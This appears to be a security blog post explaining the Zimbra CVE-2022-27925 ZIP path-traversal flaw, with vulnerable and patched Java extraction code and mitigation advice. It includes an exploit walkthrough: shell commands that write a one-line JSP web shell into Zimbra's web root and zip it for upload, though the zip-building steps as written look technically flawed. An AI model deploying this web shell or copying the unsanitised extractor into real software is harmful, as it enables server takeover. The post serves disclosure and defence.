CVE-2022-27925 - How a ZIP File Opened Zimbra to Arbitrary File Uploads (with Exploit Walkthrough)

Zimbra Collaboration Suite (ZCS) is a popular open-source webmail service used by thousands of organizations. In 2022, a major vulnerability was discovered: CVE-2022-27925. This bug let attackers upload any file anywhere on the server—simply by exploiting how Zimbra handled certain ZIP files. In this post, we’ll break down how the bug works, walk through a code-level example, and explain just how dangerous it really is.

What Is CVE-2022-27925?

Zimbra versions 8.8.15 and 9. have a feature called mboximport that allows admin users to import email archives via ZIP files for backup and restore. But here’s the catch: Zimbra didn’t properly check the file paths inside these ZIP files. That meant if an attacker could login as an admin, they could use directory traversal (like ../../) to plant files anywhere on the system—even dropping malicious code in executable locations.

In short:  
> Any admin user could upload a ZIP file containing, for example, a web shell, and cause it to land outside its intended directory—potentially giving them full remote code execution.

Step 1: Prepare a Malicious ZIP File

Let’s say the attacker wants to upload a web shell to the Zimbra web server’s root. The ZIP file would look like this:

archive.zip
|
|-- ../../../../opt/zimbra/jetty/webapps/zimbra/public/shell.jsp

That file path, with all the ../, tells Zimbra to unzip the web shell directly under the web server’s public directory. Normally, a ZIP handler should block this—but here, it didn’t.

Step 2: Log in as Admin

This bug does require admin credentials. But—many organizations give lots of people (helpdesk, IT, MSPs) admin access, and sometimes credentials are leaked or re-used. Once logged in, the attacker uses the Zimbra web interface or API to upload the ZIP using the mboximport feature.

Step 3: Trigger the Upload

From there, the Zimbra server automatically extracts the ZIP, dropping the unwanted file wherever the attacker chose. The attacker can now access their shell from the web.

Code Walkthrough: Avoiding Path Traversal

Here’s a simplified version of what went wrong, showing a Java ZIP extractor that doesn’t sanitize file paths:

while ((entry = zipInputStream.getNextEntry()) != null) {
    File outFile = new File(targetDir, entry.getName());
    // This literally concatenates targetDir and the ZIP entry filename!
    // If entry.getName() = "../../../../etc/passwd", it's game over.
    
    FileOutputStream fos = new FileOutputStream(outFile);
    // ... Write file
}

If entry.getName() is ../../../../some/directory/file, the new file will be created outside the intended extraction folder!

A Proper Patch Would Sanitize Like

File outFile = new File(targetDir, entry.getName());
String canonicalPath = outFile.getCanonicalPath();
String canonicalTargetDir = new File(targetDir).getCanonicalPath();
if (!canonicalPath.startsWith(canonicalTargetDir)) {
    throw new RuntimeException("Possible directory traversal attack!");
}

This checks that files can’t be written outside the extraction directory.

Here’s how you’d create a ZIP file with a traversal path on Linux

mkdir -p exploit/../../../../opt/zimbra/jetty/webapps/zimbra/public/
echo "<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>" > exploit/../../../../opt/zimbra/jetty/webapps/zimbra/public/shell.jsp
cd exploit
zip -r ../exploit.zip *

Then, upload exploit.zip via the Zimbra admin interface’s import functionality.

Impact and Danger

- Access Level Required: Zimbra administrator account (but many organizations have too many admins).
- Results: Write any file anywhere as the user running Zimbra (usually zimbra), including web shells in the app root.
- Chaining: Combined with other vulnerabilities (like auth bypass!), it could lead to full takeover, ransomware, or email theft.

Exploit in the Wild

Even though admin access is needed, attackers actively exploited this bug—often by combining with other vulnerabilities, like CVE-2022-37042 (an auth bypass), to get in without credentials. Some exploit kits chained the two to compromise thousands of Zimbra servers.

Official advisory:

- Zimbra security advisory
 - NVD entry

Postmortems and Technical Writeups:

- SonarSource Research Blog: Zimbra Pre-Auth RCE
 - Rapid7 Analysis

Limit admin accounts: Keep admin logins to a minimum. Use unique, long passwords and MFA.

- Monitor server files: Watch for unexpected files in web roots or /tmp.

Conclusion

CVE-2022-27925 is a textbook example of why ZIP extraction is risky and why file path validation matters—not just for user uploads, but anywhere files come into your app. If you run Zimbra and haven’t patched yet, stop reading, and go patch! Even if you trust your admins, bugs like this show how quickly a misstep can endanger your entire organization.

Thanks for reading! If you want more hands-on security breakdowns, leave a comment below. Stay safe!

Timeline

Published on: 04/21/2022 00:15:00 UTC
Last modified on: 08/24/2022 15:15:00 UTC